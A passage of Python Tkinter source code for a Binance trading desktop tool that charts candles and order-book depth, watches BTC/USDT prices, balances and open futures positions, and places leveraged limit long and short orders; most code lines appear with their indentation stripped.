yyp2 = grMd - ((float(myDicGr1TT[3])-yI0)/(prSt*10))* grSt # MinPrice
yyp3 = grMd - ((float(myDicGr1TT[1])-yI0)/(prSt*10))* grSt #Open Price
yyp4 = grMd - ((float(myDicGr1TT[4])-yI0)/(prSt*10))* grSt #Close Price
# print (xxp,yyp1,yyp2,yyp3,yyp4)
if xxp > 1000:
app.graph_Sm.configure(scrollregion=(-500,-500,xxp+100,1000))
app.graph_Tb.configure(scrollregion=(-500,0,xxp+100,70))
app.graph_Td.configure(scrollregion=(-500,0,xxp+100,70))
#print (grMd, ' - ', yyp)
if float(myDicGr1TT[1])<float(myDicGr1TT[4]):
flc = "green"
else:
flc="red"
app.graph_Sm.create_line(xxp, yyp1, xxp, yyp2, fill=flc)
app.graph_Sm.create_line(xxp-1, yyp3, xxp+1, yyp3, fill=flc)
app.graph_Sm.create_line(xxp-1, yyp4, xxp+1, yyp4, fill=flc)
#print (len(myDicGr1))
for mm in range(len(myDicGr1Ft)):
myDicGr1TT = myDicGr1Ft[mm]
#print (myDicGr1TT)
xx=myDicGr1TT[0]
# print (xx)
xxp = 696 + ((((xx - TT0)/1000)+150)/300)*8
yyp1 = grMd - ((float(myDicGr1TT[2])-yI0)/(prSt*10))* grSt # MaxPrice
yyp2 = grMd - ((float(myDicGr1TT[3])-yI0)/(prSt*10))* grSt # MinPrice
yyp3 = grMd - ((float(myDicGr1TT[1])-yI0)/(prSt*10))* grSt #Open Price
yyp4 = grMd - ((float(myDicGr1TT[4])-yI0)/(prSt*10))* grSt #Close Price
# print (xxp,yyp1,yyp2,yyp3,yyp4)
if xxp > 1000:
app.graph_Sm.configure(scrollregion=(-500,-500,xxp+100,1000))
app.graph_Tb.configure(scrollregion=(-500,0,xxp+100,70))
app.graph_Td.configure(scrollregion=(-500,0,xxp+100,70))
#print (grMd, ' - ', yyp)
                            # FUTURES candles are drawn in black regardless of direction (they overlay the coloured SPOT candles)
                            flc = "black"
app.graph_Sm.create_line(xxp, yyp1, xxp, yyp2, fill=flc)
app.graph_Sm.create_line(xxp-1, yyp3, xxp+1, yyp3, fill=flc)
app.graph_Sm.create_line(xxp-1, yyp4, xxp+1, yyp4, fill=flc)
#Order Book Graph
app.graph_2.delete("all")
for m in range (int(len(mylist5_Ft))):
if float(mylist5_Ft[m][1])>(grOW/20):
points=[]
x0 = 180
y0 = grMd - ((float(mylist5_Ft[m][0])-yI0)/(prSt*10))* (grSt/10)
pp=(x0,y0)
points.append(pp)
x1 = 180 - (float(mylist5_Ft[m][1])/(grOW/100))*10
y1 = grMd - ((float(mylist5_Ft[m][0])-yI0)/(prSt*10))* (grSt/10)
pp=(x1,y1)
points.append(pp)
app.graph_2.create_line(points,fill="pink",width=(grSt/10))
if float(mylist4_Ft[m][1])>(grOW/20):
points=[]
x0 = 180
y0 = grMd - ((float(mylist4_Ft[m][0])-yI0)/(prSt*10))* (grSt/10)
#print('-', yI0, ' - ', float(mylist4[m][0]))
pp=(x0,y0)
points.append(pp)
x1 = 180 - (float(mylist4_Ft[m][1])/(grOW/100))*10
#print(float(mylist4[m][1]))
y1 = grMd - ((float(mylist4_Ft[m][0])-yI0)/(prSt*10))* (grSt/10)
pp=(x1,y1)
points.append(pp)
app.graph_2.create_line(points,fill="lightgreen",width=(grSt/10))
if m==0:
y0 = grMd - ((float(mylist4_Ft[m][0])-yI0)/(prSt*10))* grSt
#print(mylist4[m][0],x0, y0, x1, y1)
app.graph_Sm.coords(GAP_Sp, -500, y0, 800, y0)
app.graph_Sm.itemconfigure(GAP_SpT,text=float(mylist4_Ft[m][0]))
class Timer_BTCUSDT:
def __init__(self):
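        # BTC/USDT watcher: roughly every 0.5 s it compares the current best bid on SPOT and FUTURES with the
        # high/low of the last five 1m candles and shows the distances (in percent) in label_BU.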
global TE_BU
while True:
if PS_BU == False:
                sys_msg = ' BTC/USDT watcher stopped.'
app.Sys_Msg(text1=sys_msg)
TE_BU = True
break
if should_run_BU:
for i in range(400):
if not should_run_BU:
#print('Stopped...')
ss_BU = 'Stopped...' + '\n BTC/USDT watcher'
app.label_BU.config(text = ss_BU)
app.label_BU['bg']='SystemButtonFace'
app.label_BU['fg']='SystemButtonText'
                        sys_msg = ' BTC/USDT watcher will be stopped.'
app.Sys_Msg(text1=sys_msg)
break
if should_run_BU:
if i==0:
                            sys_msg = ' BTC/USDT watcher started.'
app.Sys_Msg(text1=sys_msg)
TE_BU = False
if i > 0:
time.sleep(0.5)
myTupSpK =('klines', bot.klines(symbol='BTCUSDT', interval='1m', limit=5)) #Tupl
#print (myTup131[1])
myDicGr1Sp = myTupSpK[1] #dict
#print(myDicGr1)
yI_Sp_0=0
yI_Sp_1=0
for ii in range(len(myDicGr1Sp)):
if ii == 0:
yI_Sp_1=float(myDicGr1Sp[ii][3])
if float(myDicGr1Sp[ii][2])>yI_Sp_0:
yI_Sp_0=float(myDicGr1Sp[ii][2]) #High
                                if float(myDicGr1Sp[ii][3])<yI_Sp_1:
                                    yI_Sp_1=float(myDicGr1Sp[ii][3]) #Low
myTupFtK = ('futuresKlines', bot.futuresKlines(symbol='BTCUSDT', interval='1m', limit=5)) #tupl
#print(myTup12)
myDicGr1Ft = myTupFtK[1]
#print(myDicGr1)
yI_Ft_0=0
yI_Ft_1=1
for ii in range(len(myDicGr1Ft)):
if ii == 0:
yI_Ft_1=float(myDicGr1Ft[ii][3])
if float(myDicGr1Ft[ii][2])>yI_Ft_0:
yI_Ft_0=float(myDicGr1Ft[ii][2]) #High
                                if float(myDicGr1Ft[ii][3])<yI_Ft_1:
                                    yI_Ft_1=float(myDicGr1Ft[ii][3]) #Low
ss_BU = 'SPOT: xx%, FUTURES xx%'
myTup_DSp = ('depth', bot.depth(symbol='BTCUSDT', limit=5)) #tupl
#print('SPOT D',myTup_DSp)
mylist3_Sp = myTup_DSp[1] #dict
mylist4_Sp=mylist3_Sp['bids'] #list
myTup_DFt = ('FutDepth', bot.futuresDepth(symbol='BTCUSDT', limit=5)) #tupl
#print('FT D',myTup_DFt)
mylist3_Ft = myTup_DFt[1] #dict
mylist4_Ft=mylist3_Ft['bids'] #list
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str=time_local_time.strftime("[%H:%M:%S] ")
xx1 = (float(mylist4_Sp[0][0])-yI_Sp_0)/(float(mylist4_Sp[0][0])/100)
ss_BU = time_local_str + 'SPOT: ' + "%.2f" % (xx1) + '%, '
xx2 = (float(mylist4_Ft[0][0])-yI_Ft_0)/(float(mylist4_Ft[0][0])/100)
ss_BU += 'FRS: ' + "%.2f" % (xx2) + '%, '
xx3 = (float(mylist4_Sp[0][0])-yI_Sp_1)/(float(mylist4_Sp[0][0])/100)
ss_BU += '\n' + time_local_str + 'SPOT: ' + "%.2f" % (xx3) + '%, '
xx4 = (float(mylist4_Ft[0][0])-yI_Ft_1)/(float(mylist4_Ft[0][0])/100)
ss_BU += 'FRS: ' + "%.2f" % (xx4) + '%, '
app.label_BU.config(text = ss_BU)
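                            # Simple alert heuristic: blink pink/red while BTC trades below the recent 1m low on both
                            # markets (or clearly closer to the low than to the high), blink green while it trades above
                            # the recent high (or clearly closer to it); otherwise keep the neutral label colours.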
if (xx3<0 and xx4<0) or ((xx1<-0.25 and xx2<-0.25) and (-xx1>xx3 and -xx2>xx4)):
if app.label_BU['bg']=='SystemButtonFace':
app.label_BU['bg']='pink'
app.label_BU['fg']='SystemButtonText'
else:
app.label_BU['bg']='SystemButtonFace'
app.label_BU['fg']='red'
elif (xx1>0 and xx2>0) or ((xx3>0.25 and xx4>0.25)and (xx3>(-xx1) and xx4>(-xx2))):
if app.label_BU['bg']=='SystemButtonFace':
app.label_BU['bg']='lightgreen'
app.label_BU['fg']='SystemButtonText'
else:
app.label_BU['bg']='SystemButtonFace'
app.label_BU['fg']='green'
else:
app.label_BU['bg']='SystemButtonFace'
app.label_BU['fg']='SystemButtonText'
class Timer_AccBlns:
def __init__(self):
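        # Balance watcher: periodically refreshes the SPOT USDT balance, the FUTURES wallet, the total
        # unrealized PnL (plus which major trading sessions are currently open), and the table of open
        # futures positions (Tree_Ord).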
global TE_AB
i=0
while True:
if PS_AB == False:
                sys_msg = ' Balance watcher stopped.'
app.Sys_Msg(text1=sys_msg)
TE_AB = True
break
if should_run_AB:
#for i in range(400):
if not should_run_AB:
#print('Stopped...')
                    sys_msg = ' Balance watcher will be stopped.'
app.Sys_Msg(text1=sys_msg)
break
if should_run_AB:
if i==0:
                        sys_msg = ' Balance watcher started.'
app.Sys_Msg(text1=sys_msg)
TE_AB = False
if i > 0:
time.sleep(0.5)
BnAcc = bot.account()
BnAcc10 = BnAcc['balances']
ss = 'SPOT balance: ' #0 USDT'
#print(BnAcc10)
for mm in range(len(BnAcc10)):
BnAcc101 = BnAcc10[mm]
if BnAcc101['asset'] =='USDT':
#print (BnAcc10[mm])
                            ss += str(BnAcc101['asset']) + "\nAvailable: " + str(BnAcc101['free']) + " USDT.\nLocked: " + str(BnAcc101['locked']) + ' USDT.'
app.label_BlnsSpt.config(text = ss)
BnFAcc = bot.futuresBalance()
#print(BnFAcc)
ss = 'FUTURE balance: ' #0 USDT'
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
if BnFAcc1['asset'] == 'USDT':
#print(BnFAcc[mm])
ss += str(BnFAcc1['asset']) + '.'
                                ss += "\nTotal: " + str(BnFAcc1['balance']) + ".\nAvailable: " + str(BnFAcc1['withdrawAvailable'])
app.label_2.config(text = ss)
BnFAcc = bot.futuresAccount()
#print(BnFAcc)
ss = 'FUTURES positions:\n'
if len(BnFAcc)>0:
BnFAcc1 = BnFAcc['totalUnrealizedProfit']
ss += 'PnL: ' + str(BnFAcc1) + ' USDT'
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str_H=time_local_time.strftime("%H")
ss += '\n'
if float(time_local_str_H)>=11 and float(time_local_str_H)<=19:
ss += 'London '
if (float(time_local_str_H)>=16 and float(time_local_str_H)<=23) or float(time_local_str_H)==0:
ss += 'New York '
if float(time_local_str_H)>=0 and float(time_local_str_H)<=8: #1..9
ss += 'Sydney '
if float(time_local_str_H)>=2 and float(time_local_str_H)<=10: #3..11
ss += 'Tokyo '
app.label_PnL.config(text = ss)
BnFAcc=bot.userPositionInfo()
                    # remember the current scroll position of the positions table so it can be restored after the refresh
                    TrSc_P=app.Tree_Ord.yview()
#print(TrSc_P)
app.List_Ord.delete(0,END)
TP_CL=app.Tree_Ord.get_children()
TP_CC=len(TP_CL)
l = TP_CC+1
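                    # Refresh the open-positions table: update a row in place when the symbol/side already exists,
                    # otherwise append a new row for every position with a non-zero amount.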
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
#print(BnFAcc1)
if len(BnFAcc1)>0:
TP_SCh = True
if TP_CC > 0:
for nn in range(1,TP_CC+1):
TP_It = app.Tree_Ord.item(nn)["values"]
if TP_It[0] == str(BnFAcc1['symbol']) and TP_It[2] == str(BnFAcc1['positionSide']):
app.Tree_Ord.item(nn, values=(str(BnFAcc1['symbol']),str(BnFAcc1['unRealizedProfit']),str(BnFAcc1['positionSide']),str(BnFAcc1['entryPrice']),
str(float(BnFAcc1['positionAmt'])*float(BnFAcc1['entryPrice'])),str(BnFAcc1['liquidationPrice'])))
TP_SCh = False
#print(TP_It[0])
if TP_SCh == True and float(BnFAcc1['positionAmt']) != 0:
#print(TP_It)
#print(str(BnFAcc1['symbol']),str(BnFAcc1['unRealizedProfit']),str(BnFAcc1['positionSide']))
app.Tree_Ord.insert(parent='',index='end',iid=l,text='',values=(str(BnFAcc1['symbol']),str(BnFAcc1['unRealizedProfit']),str(BnFAcc1['positionSide']),str(BnFAcc1['entryPrice']),
str(float(BnFAcc1['positionAmt'])*float(BnFAcc1['entryPrice'])),str(BnFAcc1['liquidationPrice'])))
l +=1
TP_CL=app.Tree_Ord.get_children()
TP_CC=len(TP_CL)
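                    # Compact the table: shift the remaining non-empty rows up over rows whose price and qty are both
                    # zero, delete the leftover rows at the bottom and restore the previous scroll position.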
TP_Tpl_Tmp=[]
for nn in range(1,TP_CC+1):
TP_It = app.Tree_Ord.item(nn)["values"]
TP_Tpl_Tmp.append(app.Tree_Ord.item(nn)["values"])
#print(TP_Tpl_Tmp[nn-1])
#print(len(app.Tree_Ord.get_children()))
kk=0
nm=False
for nn in range(1,TP_CC+1):
TP_It = app.Tree_Ord.item(nn)["values"]
if float(TP_It[3]) == 0 and float(TP_It[4]) == 0 and kk<=len(TP_Tpl_Tmp):
nm=True
km=False
for mm in range(kk,len(TP_Tpl_Tmp)):
#print(mm)
if float(TP_Tpl_Tmp[mm][3])!=0 and float(TP_Tpl_Tmp[mm][4])!=0 and km==False:
app.Tree_Ord.item(nn, values=(TP_Tpl_Tmp[mm][0],TP_Tpl_Tmp[mm][1],TP_Tpl_Tmp[mm][2],TP_Tpl_Tmp[mm][3],TP_Tpl_Tmp[mm][4],TP_Tpl_Tmp[mm][5]))
kk=mm+1
#print(nn,kk,mm)
km=True
if nm==True and km==False:
kk=len(TP_Tpl_Tmp)+1
else:
#print(nn,kk)
if nm==True and kk<TP_CC:
app.Tree_Ord.item(nn, values=(TP_Tpl_Tmp[kk][0],TP_Tpl_Tmp[kk][1],TP_Tpl_Tmp[kk][2],TP_Tpl_Tmp[kk][3],TP_Tpl_Tmp[kk][4],TP_Tpl_Tmp[kk][5]))
kk +=1
if kk>len(TP_Tpl_Tmp) and nn<=TP_CC+1:
app.Tree_Ord.delete(nn)
app.Tree_Ord.yview_moveto((TrSc_P[0]))
#print(TrSc_P[0])
if i == 0:
i = 1
class Timer_OrdTmr:
def __init__(self):
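        # Order-book chart timer: roughly every 0.5 s it pulls the full depth (limit=1000) for grSmb and redraws
        # graph_2, keeping only levels whose notional value (price x quantity) exceeds 50 000 in the quote asset
        # (asks in pink, bids in light green).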
global TE_OrdTmr
while True:
if PS_OT == False:
                sys_msg = ' Order book chart ' + grSmb + ' stopped.'
app.Sys_Msg(text1=sys_msg)
TE_OrdTmr = True
break
if should_run_OT:
for i in range(400):
if not should_run_OT:
                        sys_msg = ' Order book chart ' + grSmb + ' will be stopped.'
app.Sys_Msg(text1=sys_msg)
break
if should_run_OT:
if i==0:
                            sys_msg = ' Order book chart ' + grSmb + ' started.'
app.Sys_Msg(text1=sys_msg)
TE_OrdTmr = False
if i > 0:
time.sleep(0.5)
if MS=='SPOT':
myTup11 = ('depth', bot.depth(symbol=grSmb, limit=1000)) #tupl (IF LIMIT<=50 THEN WEIGHT = 2; LIMIT=100 WEIGHT = 5;LIMIT=500 WEIGHT = 10;LIMIT=1000 WEIGHT = 20)
mylist3 = myTup11[1] #dict
mylist4=mylist3['bids'] #list
mylist5=mylist3['asks'] #list
elif MS=='FUTURES':
myTup11 = ('FutDepth', bot.futuresDepth(symbol=grSmb, limit=1000)) #tupl
mylist3 = myTup11[1] #dict
mylist4=mylist3['bids'] #list
mylist5=mylist3['asks'] #list
#Order Book Graph
app.graph_2.delete("all")
for m in range (int(len(mylist5))):
if float(mylist5[m][1])>0:
if (float(mylist5[m][1])*float(mylist5[m][0]))>50000:
points=[]
x0 = 180
y0 = grMd - ((float(mylist5[m][0])-y0I_TP)/(prSt*10))* (grSt/10)
pp=(x0,y0)
points.append(pp)
x1 = 180 - (float(mylist5[m][1])/(grOW/100))*10
y1 = grMd - ((float(mylist5[m][0])-y0I_TP)/(prSt*10))* (grSt/10)
pp=(x1,y1)
points.append(pp)
app.graph_2.create_line(points,fill="pink",width=(grSt/10))
for m in range (int(len(mylist4))):
if float(mylist4[m][1])>0:
if (float(mylist4[m][1])*float(mylist4[m][0]))>50000:
points=[]
x0 = 180
y0 = grMd - ((float(mylist4[m][0])-y0I_TP)/(prSt*10))* (grSt/10)
#print('-', yI0, ' - ', float(mylist4[m][0]))
pp=(x0,y0)
points.append(pp)
x1 = 180 - (float(mylist4[m][1])/(grOW/100))*10
#print(float(mylist4[m][1]))
y1 = grMd - ((float(mylist4[m][0])-y0I_TP)/(prSt*10))* (grSt/10)
pp=(x1,y1)
points.append(pp)
app.graph_2.create_line(points,fill="lightgreen",width=(grSt/10))
class Timer_Zoom:
def __init__(self):
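        # Zoomed order-book view: polls the top 20 depth levels roughly every 10 ms and redraws graph_Zm with one
        # thick bar and a price label per level (asks in pink, bids in light green).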
global ss
global yI
global Lo
global yI0Zm
global TE_Zm
while True:
if Ord_Zm == False:
                sys_msg = ' Order book zoom ' + grSmb + ' stopped.'
app.Sys_Msg(text1=sys_msg)
TE_Zm = True
break
if should_run_OZ:
for i in range(400):
if not should_run_OZ:
                        sys_msg = ' Order book zoom ' + grSmb + ' will be stopped.'
app.Sys_Msg(text1=sys_msg)
break
if should_run_OZ:
if i==0:
TE_Zm = False
                            sys_msg = ' Order book zoom ' + grSmb + ' started.'
app.Sys_Msg(text1=sys_msg)
if i > 0:
time.sleep(0.01)
                            #View in a browser: https://api.binance.com/api/v1/depth?symbol=ETHBTC
                            #limit - number of records returned, from 5 to 1000 (default 100).
                            #Allowed values: 5, 10, 20, 50, 100, 500, 1000.
                            #0 may also be passed, but it can return a very large amount of data.
                            #The request weight depends on limit: for 5 to 100 the weight is 1,
                            #for 500 it is 5 and for 1000 it is 10.
#print (grSmb)
if MS=='SPOT':
myTup11 = ('depth', bot.depth(symbol=grSmb, limit=20)) #tupl
mylist3 = myTup11[1] #dict
mylist4=mylist3['bids'] #list
mylist5=mylist3['asks'] #list
elif MS=='FUTURES':
myTup11 = ('FutDepth', bot.futuresDepth(symbol=grSmb, limit=20)) #tupl
mylist3 = myTup11[1] #dict
mylist4=mylist3['bids'] #list
mylist5=mylist3['asks'] #list
#print (mylist4)
if i==0:
yI0Zm=float(mylist4[19][0])
grMd = grH/2
grSt = grZm/(yI0Zm*0.01/prSt)
TT0 = time.mktime(time.localtime())*1000
grStZ=1000/40
#Order Book Graph
app.graph_Zm.delete("all")
yI0Zm=float(mylist4[0][0])
for m in range (int(len(mylist5))):
if float(mylist5[m][1])>0:
points=[]
x0 = 180
y0 = grMd - ((float(mylist5[m][0])-yI0Zm)/prSt)* grStZ
pp=(x0,y0)
points.append(pp)
x1 = 180 - (float(mylist5[m][1])/(grOW/200))*10
y1 = grMd - ((float(mylist5[m][0])-yI0Zm)/prSt)* grStZ
pp=(x1,y1)
points.append(pp)
app.graph_Zm.create_line(points,fill="pink",width=grStZ)
if prSt >= 0.1:
app.graph_Zm.create_text(30,y1 + 0*grSt/2,text="%.2f" % float(mylist5[m][0]))
elif 0.1 > prSt >= 0.01:
app.graph_Zm.create_text(30,y1 + 0*grSt/2,text="%.2f" % float(mylist5[m][0]))
elif 0.01 > prSt >= 0.001:
app.graph_Zm.create_text(30,y1 + 0*grSt/2,text="%.3f" % float(mylist5[m][0]))
elif 0.001 > prSt >= 0.0001:
app.graph_Zm.create_text(30,y1 + 0*grSt/2,text="%.4f" % float(mylist5[m][0]))
elif prSt < 0.0001:
app.graph_Zm.create_text(30,y1 + 0*grSt/2,text="%.8f" % float(mylist5[m][0]))
if float(mylist4[m][1])>0:
points=[]
x0 = 180
y0 = grMd - ((float(mylist4[m][0])-yI0Zm)/prSt)* grStZ
#print('-', yI0, ' - ', float(mylist4[m][0]))
pp=(x0,y0)
points.append(pp)
x1 = 180 - (float(mylist4[m][1])/(grOW/200))*10
#print(float(mylist4[m][1]))
y1 = grMd - ((float(mylist4[m][0])-yI0Zm)/prSt)* grStZ
pp=(x1,y1)
points.append(pp)
app.graph_Zm.create_line(points,fill="lightgreen",width=grStZ)
if prSt >= 0.1:
app.graph_Zm.create_text(30,y1 + 0*grSt/2,text="%.2f" % float(mylist4[m][0]))
elif 0.1 > prSt >= 0.01:
app.graph_Zm.create_text(30,y1 + 0*grSt/2,text="%.2f" % float(mylist4[m][0]))
elif 0.01 > prSt >= 0.001:
app.graph_Zm.create_text(30,y1 + 0*grSt/2,text="%.3f" % float(mylist4[m][0]))
elif 0.001 > prSt >= 0.0001:
app.graph_Zm.create_text(30,y1 + 0*grSt/2,text="%.4f" % float(mylist4[m][0]))
elif prSt < 0.0001:
app.graph_Zm.create_text(30,y1 + 0*grSt/2,text="%.8f" % float(mylist4[m][0]))
class Timer_End:
def __init__(self):
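        # Waits until every worker thread has reported that it stopped (all TE_* flags are True),
        # then destroys the main window.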
while True:
if TE_Tck==True and TE_Cnd == True and TE_CndSm == True and TE_BU == True and TE_AB == True and TE_Zm == True and TE_OrdTmr == True:
root.destroy()
break
time.sleep(0.01)
def close_window():
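    # Ask for confirmation, then clear all run flags so the worker threads exit, and let Timer_End
    # destroy the main window once they have all stopped.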
global ep
global should_run_T
global should_run_C
global should_run_S
global should_run_BU
global should_run_AB
global should_run_OT
global should_run_OZ
global PS1
global PS_BU
global PS_AB
global PS_OT
global Ord_Zm
    ep=messagebox.askokcancel(title=None, message='Do you really want to exit the program?')
if ep==True:
should_run_T=False
PS1 = True
should_run_C=False
should_run_S=False
should_run_BU=False
PS_BU = False
should_run_AB=False
PS_AB = False
should_run_OT=False
PS_OT = False
should_run_OZ=False
Ord_Zm = False
TEPr = threading.Thread(target=Timer_End,daemon=True)
TEPr.start()
#______________BUTTON 1_CLICK BEGIN - Start/Stop TICK/CANDLE GRAPH
def click_button1():
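    # Start or stop the chart thread that matches the currently selected graph mode:
    # Timer_Tick for TICK, Timer_Candle for the CANDLE intervals, Timer_Candle_Summ for CANDLE SUMM.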
global should_run_T
global should_run_C
global should_run_S
global myFont
global PS1
#print(GS)
myFont = font.Font(size=15)
app.button_1['font'] = myFont
if GS == 'TICK':
if should_run_T == True:
should_run_T = False
PS1 = True
app.button_1['font']=myFont
app.button_1.config(text="Start", fg='green')
else:
PS1 = False
t1 = threading.Thread(target=Timer_Tick,daemon=True)
t1.start()
app.button_1.config(text="Stop", fg='red')
should_run_T = True
    elif GS == 'CANDLE 1m' or GS == 'CANDLE 5m' or GS == 'CANDLE 15m' or GS == 'CANDLE 30m' or GS == 'CANDLE 1h' or GS == 'CANDLE 4h' or GS == 'CANDLE 1d':
if should_run_C == True:
should_run_C = False
PS1 = True
app.button_1['font']=myFont
app.button_1.config(text="Start", fg='green')
else:
PS1 = False
t2 = threading.Thread(target=Timer_Candle,daemon=True)
t2.start()
app.button_1.config(text="Stop", fg='red')
should_run_C = True
elif GS == 'CANDLE SUMM':
if should_run_S == True:
should_run_S = False
PS1 = True
app.button_1['font']=myFont
app.button_1.config(text="Start", fg='green')
else:
PS1 = False
timer_3_CSumm = threading.Thread(target=Timer_Candle_Summ,daemon=True)
timer_3_CSumm.start()
app.button_1.config(text="Stop", fg='red')
should_run_S = True
#______________BUTTON 1_CLICK END - Start/Stop TICK/CANDLE GRAPH
#______________BUTTON 2_CLICK BEGIN - Start/Stop BTC WATCHER
def click_button2():
global PS_BU
global should_run_BU
myFont = font.Font(size=10)
app.button_2['font'] = myFont
#print (PS_BU, should_run_BU)
if PS_BU == True and should_run_BU == True:
PS_BU = False
should_run_BU = False
app.button_2.config(text="Start", fg='green')
elif PS_BU == False and should_run_BU == False:
PS_BU = True
should_run_BU = True
timer_BU = threading.Thread(target=Timer_BTCUSDT,daemon=True)
timer_BU.start()
app.button_2.config(text="Stop", fg='red')
#______________BUTTON 2_CLICK END - Start/Stop BTC WATCHER
#______________BUTTON AB_CLICK BEGIN - Start/Stop ACCOUNT BALANCES WATCHER + FUTURES POSITIONS WATCHER
def click_buttonAB():
global PS_AB
global should_run_AB
myFont = font.Font(size=10)
app.button_AB['font'] = myFont
#print (PS_AB, should_run_AB)
if PS_AB == True and should_run_AB == True:
PS_AB = False
should_run_AB = False
app.button_AB.config(text="Start", fg='green')
elif PS_AB == False and should_run_AB == False:
PS_AB = True
should_run_AB = True
timer_AB = threading.Thread(target=Timer_AccBlns,daemon=True)
timer_AB.start()
app.button_AB.config(text="Stop", fg='red')
#______________BUTTON 2_CLICK END - Start/Stop BTC WATCHER + FUTURES WALLET WATCHER
#______________BUTTON OrdTmr_CLICK BEGIN - Start/Stop DEPTH TIMER
def click_button_OrdTmr():
global PS_OT
global should_run_OT
myFont = font.Font(size=10)
app.button_OrdTmr['font'] = myFont
#print (PS_BU, should_run_BU)
if PS_OT == True and should_run_OT == True:
PS_OT = False
should_run_OT = False
app.button_OrdTmr.config(text="Start", fg='green')
elif PS_OT == False and should_run_OT == False:
PS_OT = True
should_run_OT = True
timer_OT = threading.Thread(target=Timer_OrdTmr,daemon=True)
timer_OT.start()
app.button_OrdTmr.config(text="Stop", fg='red')
#______________BUTTON OrdTmr_CLICK END - Start/Stop DEPTH TIMER
#______________BUTTON Zm_CLICK BEGIN - Start/Stop DEPTH ZOOM
def click_button_Zm():
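    # Toggle between the normal order-book canvas (graph_2) and the zoomed view (graph_Zm),
    # starting or stopping the Timer_Zoom thread accordingly.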
global Ord_Zm
global should_run_OZ
wh = root.winfo_height()
ww = root.winfo_width()
if Ord_Zm == False:
should_run_OZ = True
Ord_Zm = True
app.graph_Zm.place(x=ww-420,y=150,width=200,height=wh-320)
app.graph_2.place_forget()
app.button_Ord.config(text="Norm")
timer_Zm = threading.Thread(target=Timer_Zoom,daemon=True)
timer_Zm.start()
else:
should_run_OZ = False
Ord_Zm = False
app.button_Ord.config(text="Zoom")
app.graph_2.place(x=ww-420,y=150,width=200,height=wh-320)
app.graph_Zm.place_forget()
#______________BUTTON Zm_CLICK END - Start/Stop DEPTH ZOOM
#______________BUTTON NwOL_CLICK BEGIN (New Order Long) - SET NEW LONG FUTURES ORDER
def click_buttonNwOL():
    #By default the futures account keeps the position mode set to One-way. To use Hedge Mode (dual-side positions),
    #enable it via the endpoint POST /fapi/v1/positionSide/dual with the parameter dualSidePosition = true.
    #Open position:  Long: positionSide=LONG, side=BUY    Short: positionSide=SHORT, side=SELL
    #Close position: Close long: positionSide=LONG, side=SELL    Close short: positionSide=SHORT, side=BUY
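    # Order size: quantity = margin * leverage / price, then formatted to the pair's lot step (orLSS)
    # before a LIMIT BUY with positionSide='LONG' is submitted.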
if MS == 'FUTURES':
k1_f = float(app.text_POrd.get(1.0,'end'))
k1_s = app.text_POrd.get(1.0,'end')
k2_f = float(app.text_QOrd.get(1.0,'end'))
k2_s = app.text_QOrd.get(1.0,'end')
k3_f=(k2_f*int(Lvrg))/k1_f
#print(k3_f,' ', orLSS)
if float(orLSS) >= 1:
k3_s = int(k3_f)
elif 1> float(orLSS) >= 0.1:
k3_s = "%.1f" % (k3_f)
elif 0.1 > float(orLSS) >= 0.01:
k3_s = "%.2f" % (k3_f)
elif 0.01 > float(orLSS) >= 0.001:
k3_s = "%.3f" % (k3_f)
elif 0.001 > float(orLSS) >= 0.0001:
k3_s = "%.4f" % (k3_f)
elif 0.00001 <= float(orLSS) < 0.0001:
k3_s = "%.5f" % (k3_f)
elif 0.000001 <= float(orLSS) < 0.00001:
k3_s = "%.6f" % (k3_f)
elif 0.0000001 <= float(orLSS) < 0.000001:
k3_s = "%.7f" % (k3_f)
elif float(orLSS) < 0.0000001:
k3_s = "%.8f" % (k3_f)
#print(k3_s)
if k1_f > 0 and k2_f > 0:
bot.futuresCreateOrder(symbol=grSmb, recvWindow=5000, side='BUY', positionSide='LONG', type='LIMIT', timeInForce='GTC', quantity=k3_s, price=k1_f, newOrderRespType='FULL')
            sys_msg = ' LONG buy order for ' + grSmb + ' placed at ' + str(k1_f) + ' USDT for ' + str(k3_s) + ' of the asset.'
            sys_msg += ' Margin ' + str(k2_f) +' USDT, order value ' + str(k3_f*k1_f) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
#______________BUTTON NwOL_CLICK END (New Order Long) - SET NEW LONG FUTURES ORDER
#______________BUTTON NwOL_CLICK BEGIN (New Order Short) - SET NEW SHORT FUTURES ORDER
def click_buttonNwOS():
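    # Same as click_buttonNwOL but for the SHORT side: quantity = margin * leverage / price, rounded to the
    # lot step (orLSS), submitted as a LIMIT SELL with positionSide='SHORT'.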
if MS == 'FUTURES':
k1_f = float(app.text_POrd.get(1.0,'end'))
k1_s = app.text_POrd.get(1.0,'end')
k2_f = float(app.text_QOrd.get(1.0,'end'))
k2_s = app.text_QOrd.get(1.0,'end')
k3_f=(k2_f*int(Lvrg))/k1_f
#print(k3_f)
if float(orLSS) >= 1:
k3_s = int(k3_f)
elif 1> float(orLSS) >= 0.1:
k3_s = "%.1f" % (k3_f)
elif 0.1 > float(orLSS) >= 0.01:
k3_s = "%.2f" % (k3_f)
elif 0.01 > float(orLSS) >= 0.001:
k3_s = "%.3f" % (k3_f)
elif 0.001 > float(orLSS) >= 0.0001:
k3_s = "%.4f" % (k3_f)
elif 0.00001 <= float(orLSS) < 0.0001:
k3_s = "%.5f" % (k3_f)
elif 0.000001 <= float(orLSS) < 0.00001:
k3_s = "%.6f" % (k3_f)
elif 0.0000001 <= float(orLSS) < 0.000001:
k3_s = "%.7f" % (k3_f)
elif float(orLSS) < 0.0000001:
k3_s = "%.8f" % (k3_f)
if k1_f > 0 and k2_f > 0:
bot.futuresCreateOrder(symbol=grSmb, recvWindow=5000, side='SELL', positionSide='SHORT', type='LIMIT', timeInForce='GTC', quantity=k3_s, price=k1_f, newOrderRespType='FULL')
            sys_msg = ' SHORT sell order for ' + grSmb + ' placed at ' + str(k1_f) + ' USDT for ' + str(k3_s) + ' of the asset.'
            sys_msg += ' Margin ' + str(k2_f) +' USDT, order value ' + str(k3_f*k1_f) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
#______________BUTTON NwOL_CLICK END (New Order Short) - SET NEW SHORT FUTURES ORDER
#______________BUTTON NwODel_CLICK BEGIN (New Order Delete) - DELETE NEW LONG/SHORT FUTURES ORDER
def click_buttonNwODel():
